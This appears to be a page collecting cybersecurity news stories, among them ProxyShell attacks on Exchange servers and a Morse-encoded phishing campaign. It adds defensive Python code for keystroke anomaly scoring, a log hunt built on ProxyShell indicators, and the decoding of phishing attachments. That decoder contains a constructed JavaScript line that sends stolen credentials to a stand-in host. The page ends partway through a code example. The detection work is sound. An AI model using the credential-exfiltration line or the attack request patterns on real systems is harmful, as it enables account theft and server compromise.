Posts by Cyber News

    A large cache of criminal case data belonging to the Dallas Police Department (DPD) is thought to have been lost forever.

    About 22 terabytes of data went missing from the DPD computer database when data was migrated from an online, cloud-based archive to a server at the city’s data center in April.

    The data that disappeared included images, video, audio, case notes and other information gathered by police officers and detectives in relation to cases from before July 28, 2020.

    Dallas PD attributes the data’s permanent loss to the actions of a single city IT employee who it says “failed to follow proper, established procedures” while performing the data migration.

    Authorities softened the announcement of the loss earlier this week with news that approximately 14 terabytes of data have since been recovered. The DPD believes the remaining eight terabytes of information are gone forever.

    The quantity of information lost is considerable, since one terabyte can store as many as six million documents and 250,000 images.

    District attorney John Creuzot said in a memo that it was “too soon to estimate how many cases will be affected and what the impact will be on those individual cases,” but he was hopeful that duplicates of some of the data may have been stored elsewhere.

    “It is possible that much of the missing evidence had already been uploaded to this office’s data portal prior to April 5,” said Creuzot.

    The absence of the case data was first noticed by city information technology officials on April 5. However, the Charlotte Observer reports that the district attorney’s office was not notified of the loss until August 6.

    This notification reportedly followed complaints from prosecutors who suddenly found themselves unable to locate computer files on pending cases.

    “It is concerning that it took four months for the Dallas Police Department to inform the district attorney of the loss of the data,” said Dallas defense attorney Amanda Branan, the president of the Dallas Criminal Defense Lawyers Association.

    Dallas Mayor Eric Johnson is calling for the Dallas City Council to launch an investigation into the data loss.

    Data theft, insider threats and imposters accessing sensitive customer data have apparently gotten so bad inside Amazon, the company is considering rolling out keyboard-stroke monitoring for its customer-service reps.

    A confidential memo from inside Amazon explained that customer-service credential abuse and data theft were on the rise, according to Motherboard, which reviewed the document. Keystroke monitoring would be a way for the company to verify the identity of whoever was accessing data.

    “We have a security gap as we don’t have a reliable mechanism for verifying that users are who they claim they are,” the document reportedly said.

    Amazon’s memo added that outsourced employees working from home in countries like India and the Philippines, where most of these security incidents occur, have created a “high data-exfiltration risk,” according to Motherboard.

    Roommates of legitimate customer-service reps looking up what famous people bought from Amazon; hackers purchasing customer-service credentials; even the use of a USB Rubber Ducky (a keystroke-injection device that types scripted input far faster than a person can) to gain access to systems: all of these are ways attackers have abused Amazon data, according to the report.

    The company added that it’s considering using a company called BehavioSec, which uses the aggregate data of a user’s mouse clicks and keystrokes to develop a profile of their typical behavior. Once that baseline of typical behavior is established, the BehavioSec tool will identify when someone’s activity is unusual. But based on Motherboard’s reporting, Amazon doesn’t seem to have settled on a final plan.

    “We are considering an option that will include capturing all keystrokes and with this functionality turned on, we may not be able to deploy the off-the-shelf solution,” the company said.
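    The kind of profiling Amazon is weighing, as an added example that is not Amazon’s or BehavioSec’s code: build a per-user baseline of keystroke flight times (the gap between consecutive key presses), then score each new session against it. The sessions are constructed with a seeded generator so the block runs offline; the 60-key session length, the two features and the thresholds are assumptions for the demonstration. It also shows why the Rubber Ducky case above is the easy one to catch: injected keystrokes arrive with almost no timing variance, which no human produces.

```python
"""Keystroke-dynamics baseline and session scoring (added example; constructed data)."""
import random
import statistics
from typing import Dict, List, Sequence

# Flight time = milliseconds between consecutive key presses. In production these
# would come from an agent on the rep's workstation; here a seeded generator
# produces constructed sessions so the example runs offline and deterministically.
_rng = random.Random(20210813)


def synth_session(mean_ms: float, jitter_ms: float, keys: int = 60) -> List[float]:
    """Constructed sample: `keys` flight times drawn around mean_ms (never below 1 ms)."""
    return [max(1.0, _rng.gauss(mean_ms, jitter_ms)) for _ in range(keys)]


def build_profile(training: Sequence[Sequence[float]]) -> Dict[str, float]:
    """Baseline for one user: mean and standard deviation over all training flight times."""
    gaps = [g for session in training for g in session]
    return {"mean": statistics.fmean(gaps), "stdev": statistics.stdev(gaps)}


def score_session(profile: Dict[str, float], gaps: Sequence[float]) -> Dict[str, float]:
    """Two features: how far the session's rhythm sits from the baseline (z-score of the
    mean flight time) and how uniform its timing is relative to the baseline spread."""
    return {
        "rhythm_z": abs(statistics.fmean(gaps) - profile["mean"]) / profile["stdev"],
        "uniformity": statistics.pstdev(gaps) / profile["stdev"],
    }


def is_anomalous(profile: Dict[str, float], gaps: Sequence[float],
                 z_threshold: float = 3.0, uniformity_floor: float = 0.25) -> bool:
    """Flag a session whose rhythm is more than 3 sigma off, or whose timing is far too
    regular to be human (scripted/injected input). Thresholds are assumptions for this demo."""
    s = score_session(profile, gaps)
    return s["rhythm_z"] > z_threshold or s["uniformity"] < uniformity_floor


# Baseline: five enrolment sessions of the legitimate rep (about 180 ms between keys).
USER_TRAINING = [synth_session(180, 40) for _ in range(5)]
PROFILE = build_profile(USER_TRAINING)

SAME_USER = synth_session(180, 40)     # the rep again: should pass
ROOMMATE = synth_session(360, 70)      # another person at the same keyboard, slower rhythm
RUBBER_DUCKY = synth_session(8, 0.5)   # scripted keystroke injection: almost no variance

if __name__ == "__main__":
    for label, session in [("same user", SAME_USER), ("roommate", ROOMMATE), ("rubber ducky", RUBBER_DUCKY)]:
        print(f"{label:13s} {score_session(PROFILE, session)} anomalous={is_anomalous(PROFILE, session)}")
```

    The z-score of a session mean against the per-key standard deviation is deliberately conservative; it is the uniformity check that separates injected input from a different human, and a real product would add digraph-level timings, mouse dynamics and a per-user threshold rather than the fixed ones used here.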

    But even this disclosure is probably downplaying how rampant the problem is, Gaurav Banga, CEO of Balbix told Threatpost.

    “Amazon is a purpose-driven company,” Banga said. “They don’t do anything for no reason.”

    What If You Don’t Know Your Employees?

    The most basic security control in any organization is the employee manager, he explained. The manager knows who the employees are, what they’re supposed to be doing and how they’re supposed to be doing it. Once employees started working from home offices, that most basic security control was lost.

    “You can’t see who’s an insider and who’s an outsider,” Banga said. “So how do you compensate for not knowing who your employees are?”

    He said keystroke monitoring is the kind of security that remote employees will have to get used to in the future.

    “Cybercriminals are becoming increasingly sophisticated in penetrating the enterprise and, once in, remain undetected for long periods of time,” Ordr CEO Greg Murphy told Threatpost. “Behavioral profiling is becoming increasingly important to be able to detect these threat actors, not just via user behaviors but anomalous patterns of behavior in connected devices.”

    Murphy explained that if a video-surveillance camera suddenly starts communicating with a malicious ransomware domain, that’s an obvious departure from regular behavior that should be investigated.

    “Amazon seems to be taking it a step further by monitoring keystrokes on customer-service agent devices,” he said. “This will be useful to detect devices that have already been compromised, particularly with many customer service agents now working from home with shared living quarters and poor physical security.”

    Murphy cautioned organizations to only use these types of monitoring controls on company-owned equipment. He added that organizations like Barclays have already riled up their employees with similar software monitoring initiatives.

    For employees worried about privacy, Banga offered a simple fix: Don’t do anything personal on a work computer.

    The flip side of that, Banga added, is that companies need to start taking control of the tech that runs their business and put firm policies in place to ensure security. Besides a basic acknowledgement that employees are subject to monitoring, Banga said he doesn’t think most people would care about their work-habit data being collected.

    Besides, Banga added, there are jobs in industries like finance and government where data protection has always been part of an employee’s role in the organization.

    “If you work for a big fish and you handle big-fish data you have to protect that data,” he added.

    Worried about where the next attack is coming from? We’ve got your back. REGISTER NOW for our upcoming live webinar, How to Think Like a Threat Actor, in partnership with Uptycs. Find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on Aug. 17 at 11AM EST for this LIVE discussion.

    The White House has ordered federal agencies to identify all the critical software in their systems and secure it.

    The order was issued to the heads of executive departments and agencies on August 10 in a memo from the Office of Management and Budget’s acting director, Shalanda Young. Recipients were given 60 calendar days from the date of the memo’s publication to pinpoint the critical software.

    According to the memo, much of the software that the federal government relies on to perform its critical functions is “commercially developed through an often-opaque process that may lack sufficient controls to prevent the creation and exploitation of significant application security vulnerabilities.”

    Young writes that this situation has resulted in “a pressing need to implement more rigorous and predictable mechanisms for ensuring that products function securely in the manner intended.”

    In the memo, Young references guidance released by the National Institute of Standards and Technology (NIST) on what constitutes critical software.

    An executive order on Improving the Nation’s Cybersecurity, issued by President Joe Biden on May 12, 2021, directed NIST to publish a definition of the term critical software.

    The resulting definition of critical software published by NIST in June described it as “any software that has, or has direct software dependencies upon, one or more components with at least one of these attributes:

    • is designed to run with elevated privilege or manage privileges;

    • has direct or privileged access to networking or computing resources;

    • is designed to control access to data or operational technology;

    • performs a function critical to trust; or,

    • operates outside of normal trust boundaries with privileged access.”

    After identifying their critical software, agencies have one year to implement the security measures set out in NIST’s critical software guidance.

    “The United States faces increasingly sophisticated malicious cyber campaigns that threaten the public sector, the private sector, and, ultimately, the American people’s security and privacy,” the memo states.

    “The federal government must improve its efforts to detect, identify, deter, protect against, and respond to these campaigns and their perpetrators.”

    American tech-driven beauty brand IL MAKIAGE has acquired Israeli deep-tech AI-based computational imaging startup Voyage81 for $40m.

    IL MAKIAGE, which is based in New York City’s Soho area, was relaunched in 2018 by brother and sister duo Oran Holtzman and Shiran Holtzman-Erel. Two years later, the company became the fastest-growing online beauty brand in the United States.

    Voyage81 developed patented software that gives smartphones hyperspectral imaging capabilities, which the company describes as the only such software in the world. Where a normal smartphone photo records three color channels, Voyage81’s software can recover 31 spectral bands.

    The acquisition of Voyage81 was the result of a long-running search for specific technology, according to IL MAKIAGE CEO Oran Holtzman.

    “For the past two years, we have been searching for computational imaging solutions that can work in beauty and wellness to further advance our existing AI capabilities,” said Holtzman.

    “I have met dozens of computer vision startups but could not find a technology that can fit our industry and was strong enough to fulfill our goals. Bringing on Voyage81’s patented technology and exceptional team to our tech and data science departments is a HUGE win for our company’s future, our users, and the industry at-large.”

    The software developed by Voyage81 can analyze skin and hair features from a photograph taken with a smartphone and use that data to create maps of blood flow and melanin. This information can in turn be used to create personalized skincare.

    Voyage81’s founder and CEO Niv Price is the former head of R&D at Unit 81, described by the Jerusalem Post as “the most elite technological unit in the Israeli Defense Forces.”

    Price said that when he met with IL MAKIAGE, he had no intention of selling the company he founded in 2019.

    “But after meeting Oran and learning about the company’s long-term vision, we realized that under the IL MAKIAGE platform, Voyage81 technology will serve and benefit hundreds of millions of consumers, fulfilling our founding goal,” said Price.

    Voyage81 isn’t the only tech company to be snapped up by IL MAKIAGE. In 2019, the beauty brand acquired NeoWize, a Y Combinator-backed data science startup that develops advanced active machine learning algorithms.

    There’s an entirely new attack surface in Exchange, a researcher revealed at Black Hat, and threat actors are now exploiting servers vulnerable to the RCE bugs.

    Researchers’ Microsoft Exchange server honeypots are being actively exploited via ProxyShell: The name of an attack disclosed at Black Hat last week that chains three vulnerabilities to enable unauthenticated attackers to perform remote code execution (RCE) and snag plaintext passwords.

    In his Black Hat presentation last week, Devcore principal security researcher Orange Tsai said that a survey shows more than 400,000 Exchange servers on the internet that are exposed to the attack via port 443. On Monday, the SANS Internet Storm Center’s Jan Kopriva reported that he found more than 30,000 vulnerable Exchange servers via a Shodan scan and that any threat actor worthy of that title would find it a snap to pull off, given how much information is available.

    Going by calculations tweeted by security researcher Kevin Beaumont, this means that, between ProxyLogon and ProxyShell, “just under 50 percent of internet-facing Exchange servers” are currently vulnerable to exploitation, according to a Shodan search.

    Breakdown of Exchange servers on Shodan vulnerable to ProxyShell or ProxyLogon, it’s just under 50% of internet facing Exchange servers.

    — Kevin Beaumont (@GossiTheDog) August 13, 2021

    On the plus side, Microsoft has already released patches for all of the vulnerabilities in question, and, cross your fingers, “chances are that most organizations that take security at least somewhat seriously have already applied the patches,” Kopriva wrote.

    The vulnerabilities affect Exchange Server 2013, 2016 and 2019.

    On Thursday, Beaumont and NCC Group’s vulnerability researcher Rich Warren disclosed that threat actors have exploited their Microsoft Exchange honeypots using the ProxyShell vulnerability.

    “Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,” Warren tweeted, along with a screen capture of the code for a C# .aspx webshell dropped in the /aspnet_client/ directory.


    Beaumont tweeted that he was seeing the same and connected it to Tsai’s talk: “Exchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from @orange_8361’s initial talk.”


    Dangerous Skating on the New Attack Surface

    In a post on Sunday, Tsai recounted the in-the-wild ProxyLogon proof of concept that Devcore reported to MSRC in late February, explaining that it made the researchers “as curious as everyone after eliminating the possibility of leakage from our side through a thorough investigation.”

    “With a clearer timeline appearing and more discussion occurring, it seems like this is not the first time that something like this happened to Microsoft,” he continued. A mail server is both a highly valuable asset and a seemingly irresistible target for attackers, given that it holds a business’s confidential secrets and corporate data.

    “In other words, controlling a mail server means controlling the lifeline of a company,” Tsai explained. “As the most common-use email solution, Exchange Server has been the top target for hackers for a long time. Based on our research, there are more than four hundred thousand Exchange Servers exposed on the Internet. Each server represents a company, and you can imagine how horrible it is when a severe vulnerability appears in Exchange Server.”

    During his Black Hat presentation, Tsai explained that the new attack surface his team discovered is based on “a significant change in Exchange Server 2013, where the fundamental protocol handler, Client Access Service (CAS), splits into frontend and backend” – a change that incurred “quite an amount of design” and yielded eight vulnerabilities, consisting of server-side bugs, client-side bugs and crypto bugs.

    He chained the bugs into three attack vectors: The now-infamous ProxyLogon that induced patching frenzy a few months back, the ProxyShell vector that’s now under active attack, and another vector called ProxyOracle.

    “These attack vectors enable any unauthenticated attacker to uncover plaintext passwords and even execute arbitrary code on Microsoft Exchange Servers through port 443, which is exposed to the Internet by about 400,000 Exchange Servers,” according to the presentation’s introduction.

    The three Exchange vulnerabilities, all of which are patched, that Tsai chained for the ProxyShell attack:

    • CVE-2021-34473 – Pre-auth path confusion leads to ACL bypass
    • CVE-2021-34523 – Elevation of privilege on Exchange PowerShell backend
    • CVE-2021-31207 – Post-auth arbitrary file-write leads to RCE

    The first two were fixed in Microsoft’s April 2021 Exchange security update and the third in the May 2021 update, but Microsoft only published the two April CVE identifiers in July, so a patch audit that keys on CVE numbers alone will understate coverage; check the installed cumulative update and security update level instead.

    ProxyShell earned the Devcore team a $200,000 bounty after they used the bugs to take over an Exchange server at the Pwn2Own 2021 contest in April.

    During his Black Hat talk, Tsai said that he discovered the Exchange vulnerabilities when targeting the Microsoft Exchange CAS attack surface. As Tsai explained, CAS is “a fundamental component” of Exchange.

    He referred to Microsoft’s documentation, which states:

    “Mailbox servers contain the Client Access services that accept client connections for all protocols. These frontend services are responsible for routing or proxying connections to the corresponding backend services on a Mailbox server.”

    “From the narrative you could realize the importance of CAS, and you could imagine how critical it is when bugs are found in such infrastructure. CAS was where we focused on, and where the attack surface appeared,” Tsai wrote. “CAS is the fundamental component in charge of accepting all the connections from the client side, no matter if it’s HTTP, POP3, IMAP or SMTP, and proxies the connections to the corresponding backend service.”

    ProxyShell Just the ‘Tip of the Iceberg’

    Of the earlier Exchange bugs Tsai reviewed while mapping the attack surface, he dubbed CVE-2020-0688 (an RCE vulnerability that involved a hard-coded cryptographic key in Exchange) the “most surprising.”

    “With this hard-coded key, an attacker with low privilege can take over the whole Exchange Server,” he wrote. “And as you can see, even in 2020, a silly, hard-coded cryptographic key could still be found in essential software like Exchange. This indicated that Exchange is lacking security reviews, which also inspired me to dig more into the Exchange security.”

    But the “most interesting” flaw is CVE-2018-8581, he said, which was disclosed by someone who cooperated with ZDI. Though it’s a “simple” server-side request forgery (SSRF), it could be combined with NTLM Relay, enabling the attacker to “turn a boring SSRF into something really fancy,” Tsai said.

    For example, it could “directly control the whole Domain Controller through a low-privilege account,” Tsai said.

    Autodiscover Figures into ProxyShell

    As BleepingComputer reported, during his presentation, Tsai explained that one of the components of the ProxyShell attack chain targets the Microsoft Exchange Autodiscover service: a service that eases configuration and deployment by providing clients access to Exchange features with minimal user input.

    Tsai’s talk evidently triggered a wave of scanning for the vulnerabilities by attackers.

    After watching the presentation, other security researchers replicated the ProxyShell exploit. The day after Tsai’s presentation, last Friday, PeterJson and Nguyen Jang published more detailed technical information about their successful reproduction of the exploit.

    Soon after, Beaumont tweeted about a threat actor who was probing his Exchange honeypot using the Autodiscover service. As of yesterday, Aug. 12, those servers were being targeted using autodiscover.json, he tweeted.


    As of Thursday, ProxyShell was dropping a 265K webshell to the C:\inetpub\wwwroot\aspnet_client folder. That is the minimum file size the attack can create, because it writes the shell through the Mailbox Export function of Exchange PowerShell, which produces a PST file with the webshell embedded in it. Warren shared a sample with BleepingComputer that showed that the webshells consist of “a simple authentication-protected script that the threat actors can use to upload files to the compromised Microsoft Exchange server.”

    Bad Packets told the outlet that as of Thursday it was seeing threat actors scanning for vulnerable ProxyShell hosts from IP addresses in the U.S., Iran and the Netherlands, using the @abc.com and @1337.com domains in their requests, from the addresses 3.15.221.32 and 194.147.142.0/24.
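    A hunt over IIS logs and the aspnet_client folder keyed on the indicators reported above, as an added example that is not Devcore’s, Microsoft’s or the researchers’ tooling. It flags autodiscover.json requests carrying a raw @domain marker in the query string (the @abc.com and @1337.com values Bad Packets reported, plus any other), requests from the 3.15.221.32 and 194.147.142.0/24 sources, any .aspx request under /aspnet_client/, and .aspx files in that folder at or above the roughly 265 KB size of the PST-export drop. The log lines are constructed in the IIS W3C default layout; the exact query shape in those lines is an assumption about what such a request looks like, not something taken from the talk.

```python
"""ProxyShell hunt over IIS W3C logs and the aspnet_client folder (added example)."""
import ipaddress
import os
from typing import Dict, Iterable, Iterator, List, Tuple

# Indicators from the reporting above: scanning sources published by Bad Packets, the
# domain markers seen in Autodiscover requests, and the PST-export size floor of the shell.
SCANNER_NETS = [ipaddress.ip_network("3.15.221.32/32"), ipaddress.ip_network("194.147.142.0/24")]
KNOWN_MARKERS = ("@abc.com", "@1337.com")
MIN_SHELL_BYTES = 265_000

# Constructed log excerpt. IIS replaces spaces inside a field with '+', so splitting on
# whitespace is safe; the query layout on the scanner lines is an assumption.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-08-12 14:01:22 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 203.0.113.9 Mozilla/5.0+(Windows) 200
2021-08-12 14:02:03 10.0.0.5 GET /autodiscover/autodiscover.json @abc.com/mapi/nspi/ 443 - 3.15.221.32 python-requests/2.25.1 200
2021-08-12 14:02:05 10.0.0.5 POST /autodiscover/autodiscover.json @1337.com/powershell/ 443 - 194.147.142.77 python-requests/2.25.1 200
2021-08-12 14:02:31 10.0.0.5 GET /autodiscover/autodiscover.json Email=jdoe%40corp.example 443 jdoe 198.51.100.4 Microsoft+Office/16.0 200
2021-08-12 14:05:10 10.0.0.5 POST /aspnet_client/e3d9k2.aspx - 443 - 194.147.142.77 Mozilla/5.0+(Windows) 200
"""


def parse_iis(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per record, keyed by the names in the most recent #Fields: header."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            parts = line.split()
            if fields and len(parts) == len(fields):
                yield dict(zip(fields, parts))


def is_reported_scanner(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SCANNER_NETS)


def classify(rec: Dict[str, str]) -> List[str]:
    """Return the indicator names a record matches (empty list = nothing of interest)."""
    hits: List[str] = []
    stem, query = rec["cs-uri-stem"].lower(), rec["cs-uri-query"]
    # Legitimate Autodiscover clients percent-encode the address (%40); a raw '@' in the
    # query is treated as the path-confusion shape (heuristic, assumption of this demo).
    if stem.endswith("/autodiscover/autodiscover.json") and "@" in query:
        hits.append("autodiscover-path-confusion")
        if any(m in query.lower() for m in KNOWN_MARKERS):
            hits.append("known-marker")
    if stem.startswith("/aspnet_client/") and stem.endswith(".aspx"):
        hits.append("aspnet_client-webshell-access")
    if is_reported_scanner(rec["c-ip"]):
        hits.append("reported-scanner-ip")
    return hits


def hunt(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """(client ip, uri stem, indicators) for every record matching at least one indicator."""
    out: List[Tuple[str, str, List[str]]] = []
    for rec in parse_iis(log_text):
        hits = classify(rec)
        if hits:
            out.append((rec["c-ip"], rec["cs-uri-stem"], hits))
    return out


def walk_sizes(root: str) -> Iterator[Tuple[str, int]]:
    """(path, size) for every file under root, e.g. C:\\inetpub\\wwwroot\\aspnet_client."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            yield path, os.path.getsize(path)


def suspicious_aspx(entries: Iterable[Tuple[str, int]], min_size: int = MIN_SHELL_BYTES) -> List[str]:
    """.aspx files at or above the PST-export floor; aspnet_client normally holds only client-side script."""
    return [p for p, size in entries if p.lower().endswith(".aspx") and size >= min_size]


if __name__ == "__main__":
    for ip, stem, hits in hunt(SAMPLE_LOG):
        print(f"{ip:16s} {stem:40s} {', '.join(hits)}")
```

    Feed `walk_sizes(r"C:\inetpub\wwwroot\aspnet_client")` into `suspicious_aspx` on a real server; the IP list will age quickly, so the path-confusion and aspnet_client checks are the ones worth keeping in a detection rule.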


    Microsoft has disclosed details of an evasive year-long social engineering campaign wherein the operators kept changing their obfuscation and encryption mechanisms every 37 days on average, including relying on Morse code, in an attempt to cover their tracks and surreptitiously harvest user credentials.

    The phishing attacks take the form of invoice-themed lures mimicking financial-related business transactions, with the emails containing an HTML file (“XLS.HTML”). The ultimate objective is to harvest usernames and passwords, which are subsequently used as an initial entry point for later infiltration attempts.

    Microsoft likened the attachment to a “jigsaw puzzle,” noting that individual parts of the HTML file are designed to appear innocuous and slip past endpoint security software, only to reveal its true colors when these segments are decoded and assembled together. The company did not identify the hackers behind the operation.

    “This phishing campaign exemplifies the modern email threat: sophisticated, evasive, and relentlessly evolving,” Microsoft 365 Defender Threat Intelligence Team said in an analysis. “The HTML attachment is divided into several segments, including the JavaScript files used to steal passwords, which are then encoded using various mechanisms. These attackers moved from using plaintext HTML code to employing multiple encoding techniques, including old and unusual encryption methods like Morse code, to hide these attack segments.”

    Opening the attachment launches a browser window that displays a fake Microsoft Office 365 credentials dialog box on top of a blurred Excel document. The dialog box urges the recipient to sign in again because access to the Excel document has purportedly timed out. If the user enters a password, the page reports that it is incorrect, while the embedded script quietly sends the credentials to the attackers in the background.

    The campaign is said to have undergone 10 iterations since its discovery in July 2020, with the adversary periodically switching up its encoding methods to mask the malicious nature of the HTML attachment and the different attack segments contained within the file.

    Microsoft said it detected the use of Morse code in the attacks’ February and May 2021 waves, while later variants of the phishing kit were found to direct the victims to a legitimate Office 365 page instead of showing a fake error message once the passwords were entered.

    “Email-based attacks continue to make novel attempts to bypass email security solutions,” the researchers said. “In the case of this phishing campaign, these attempts include using multilayer obfuscation and encryption mechanisms for known existing file types, such as JavaScript. Multilayer obfuscation in HTML can likewise evade browser security solutions.”
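    The “jigsaw puzzle” assembly described above, as an added example that is neither Microsoft’s analysis code nor the phishing kit itself: a constructed attachment whose script segments each use a different encoding (plain, base64, and Morse wrapped around hex), a decoder that reverses each layer and concatenates the pieces in order, and a small heuristic for spotting Morse-shaped blobs in raw HTML. The segment layout with a data-enc attribute, the decoder names and the script text are all constructed for the demonstration; the real kit’s segment boundaries and nesting are not described on the page.

```python
"""Layered decoding of a segmented HTML attachment, Morse included (added example)."""
import base64
import re
from typing import Callable, Dict, List, Tuple

MORSE: Dict[str, str] = {
    "A": ".-", "B": "-...", "C": "-.-.", "D": "-..", "E": ".", "F": "..-.", "G": "--.",
    "H": "....", "I": "..", "J": ".---", "K": "-.-", "L": ".-..", "M": "--", "N": "-.",
    "O": "---", "P": ".--.", "Q": "--.-", "R": ".-.", "S": "...", "T": "-", "U": "..-",
    "V": "...-", "W": ".--", "X": "-..-", "Y": "-.--", "Z": "--..", "0": "-----",
    "1": ".----", "2": "..---", "3": "...--", "4": "....-", "5": ".....", "6": "-....",
    "7": "--...", "8": "---..", "9": "----.",
}
FROM_MORSE = {code: ch for ch, code in MORSE.items()}


def morse_encode(text: str) -> str:
    """Letters separated by one space, words by ' / '. Only [A-Z0-9] are representable."""
    return " / ".join(" ".join(MORSE[c] for c in word.upper()) for word in text.split())


def morse_decode(code: str) -> str:
    """Inverse of morse_encode; unknown symbols become '?' rather than raising."""
    return " ".join("".join(FROM_MORSE.get(sym, "?") for sym in word.split())
                    for word in code.strip().split(" / "))


# One decoder per encoding layer. "morse-hex" is two layers: Morse over the hex
# digits of the script bytes, so any byte sequence survives the 36-symbol alphabet.
DECODERS: Dict[str, Callable[[str], str]] = {
    "plain": lambda s: s,
    "base64": lambda s: base64.b64decode(s).decode(),
    "morse-hex": lambda s: bytes.fromhex(morse_decode(s)).decode(),
}

# Constructed pieces of a credential-harvesting script, each hidden differently.
PLAINTEXT_PIECES = [
    "var u=document.getElementById('user').value;",
    "var p=document.getElementById('pw').value;",
    "fetch('https://collector.invalid/?u='+u+'&p='+p);",
]
SEGMENTS: List[Tuple[str, str]] = [
    ("plain", PLAINTEXT_PIECES[0]),
    ("base64", base64.b64encode(PLAINTEXT_PIECES[1].encode()).decode()),
    ("morse-hex", morse_encode(PLAINTEXT_PIECES[2].encode().hex())),
]
EXPECTED_SCRIPT = "".join(PLAINTEXT_PIECES)

# What the attachment looks like to an analyst: only the encoded pieces are visible.
ATTACHMENT_HTML = "<html><body>" + "".join(
    f'<script type="text/plain" data-enc="{enc}">{payload}</script>' for enc, payload in SEGMENTS
) + "</body></html>"

SEGMENT_RE = re.compile(r'<script[^>]*data-enc="([^"]+)"[^>]*>(.*?)</script>', re.S)


def reassemble(html: str) -> str:
    """Decode every segment with its declared layer(s) and join them in document order."""
    return "".join(DECODERS[enc](payload) for enc, payload in SEGMENT_RE.findall(html))


# Detection heuristic: eight or more dot/dash groups separated by spaces or slashes is
# Morse-shaped; ordinary HTML and JavaScript almost never contain such a run.
MORSE_BLOB = re.compile(r"(?:[.-]{1,6}[ /]+){8,}")


def morse_like_spans(html: str) -> List[str]:
    return [m.group(0) for m in MORSE_BLOB.finditer(html)]


if __name__ == "__main__":
    print("segments:", [enc for enc, _ in SEGMENTS])
    print("morse-like spans:", len(morse_like_spans(ATTACHMENT_HTML)))
    print("recovered:", reassemble(ATTACHMENT_HTML))
```

    A real kit does not label its layers; the decoding order has to be recovered from the JavaScript that does the decoding, which is why the Morse-blob heuristic is useful as a triage signal before anyone has worked out the full chain.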


    Bad bot activity rose on sporting and betting sites during sporting events such as Tour De France, EURO 2020 and the Tokyo Olympics.

    Imperva Research Labs has revealed that punters were left at risk of account takeover (ATO) attacks, leaving their digital wallets vulnerable to exploitation. Alarmingly, during the Tokyo Olympics, the company saw a spike in search engine impersonators during the first week and by week two, it grew by 103% above average.

    “Bad bots typically masquerade as legitimate users to remain undetected,” explained Imperva researchers in a blog post. “Incoming traffic to sporting sites saw an unusual 48% increase in Yahoo impersonators, 66% increase in Baidu impersonators and 88% increase in Google impersonators.

    “Imperva Research Labs also found ATO attacks grew 43% the week prior to the start of the Olympic Games, and spiked 74% during the first week of competition.”

    In the run up to the EURO 2020 football tournament, the organization monitored a 96% year-on-year increase in bot traffic on global sporting sites. ATO attacks also spiked by two or three times the daily average on the days when England played.

    Imperva also saw attacks grow larger as the tournament progressed, with a notable peak at the start of the Round of 16.

    A similar trend was spotted at the beginning of the Tour De France—bot activity on sporting and gambling sites spiked 52% as the race was scheduled to begin.

    “Bot comment spammers were pervasive, with traffic increasing 62%,” the blog post stated. “The spammers took advantage of the interest in the event to post comments in Russian about an array of topics including: adult sites, crypto, coupons/discounts, casino sites and loans and investment opportunities.”

    ATO attacks are a type of fraud where cyber-criminals use a botnet to gain illegal access to accounts that belong to other users. According to Imperva, this is usually achieved through brute force login techniques such as credential stuffing, credential cracking or a dictionary attack.

    “Gambling sites are a lucrative target for account takeover attacks because user profiles often have financial information or even funds stored,” explained the blog post. “A successful account takeover can result in financial fraud, theft of personal data or sensitive business information.”

    According to the Imperva Bad Bot Report 2021, websites face an ATO attack 16% of the time. The report also found that one third of all login attempts in 2020 were malicious. With the English Premier League and other elite football leagues in Europe set to begin playing matches and the Beijing 2022 Winter Olympics and football World Cup in Qatar on the horizon, the organization is concerned that the threat of bad bots targeting fans during these global sporting events is likely to grow.

    “The bad bot problem is increasingly complex as automated web activity accounted for more than a quarter of all web traffic in 2020,” Imperva added in its blog post. “This trend is likely to grow as fans spend more time online searching for scores, placing bets and engaging in sport community forums. To mitigate automated threats across web, mobile and APIs, companies must take proactive steps to keep their users’ data secure.”

    The organization advises that sporting and betting sites should block or CAPTCHA outdated user agents and browsers, block known hosting providers and proxy services, monitor for failed login attempts and evaluate a bot protection solution such as web application and API protection (WAAP).
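    Two of the controls Imperva lists above, as an added example that is not Imperva’s code: verifying that a request claiming to be a search-engine crawler really comes from one (reverse DNS on the client IP, then a forward lookup of that name that must return the same IP, the procedure Google, Bing, Baidu and Yahoo document for their crawlers), and spotting credential stuffing from failed-login patterns (one source trying many distinct usernames with almost no successes). The login events and the DNS answers are constructed lookup tables so the block runs offline; the thresholds are assumptions.

```python
"""Crawler-impersonator check and credential-stuffing detection (added example)."""
from collections import defaultdict
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# Reverse-DNS suffixes the engines publish for their crawlers. A "Googlebot" whose PTR
# record is not under these, or whose forward lookup disagrees, is an impersonator.
CRAWLER_RDNS_SUFFIXES: Dict[str, Tuple[str, ...]] = {
    "googlebot": ("googlebot.com", "google.com"),
    "bingbot": ("search.msn.com",),
    "baiduspider": ("baidu.com", "baidu.jp"),
    "yahoo! slurp": ("crawl.yahoo.net",),
}


def claimed_crawler(user_agent: str) -> Optional[str]:
    ua = user_agent.lower()
    return next((name for name in CRAWLER_RDNS_SUFFIXES if name in ua), None)


def verify_crawler(ip: str, user_agent: str,
                   reverse_dns: Callable[[str], Optional[str]],
                   forward_dns: Callable[[str], List[str]]) -> Optional[bool]:
    """None: the UA claims no crawler. True: PTR is under a documented suffix AND the
    forward lookup of that name contains the IP. False: claims a crawler but fails a check."""
    name = claimed_crawler(user_agent)
    if name is None:
        return None
    host = (reverse_dns(ip) or "").lower().rstrip(".")
    if not host.endswith(tuple("." + s for s in CRAWLER_RDNS_SUFFIXES[name])):
        return False
    return ip in forward_dns(host)


# Constructed DNS answers standing in for socket.gethostbyaddr / gethostbyname_ex.
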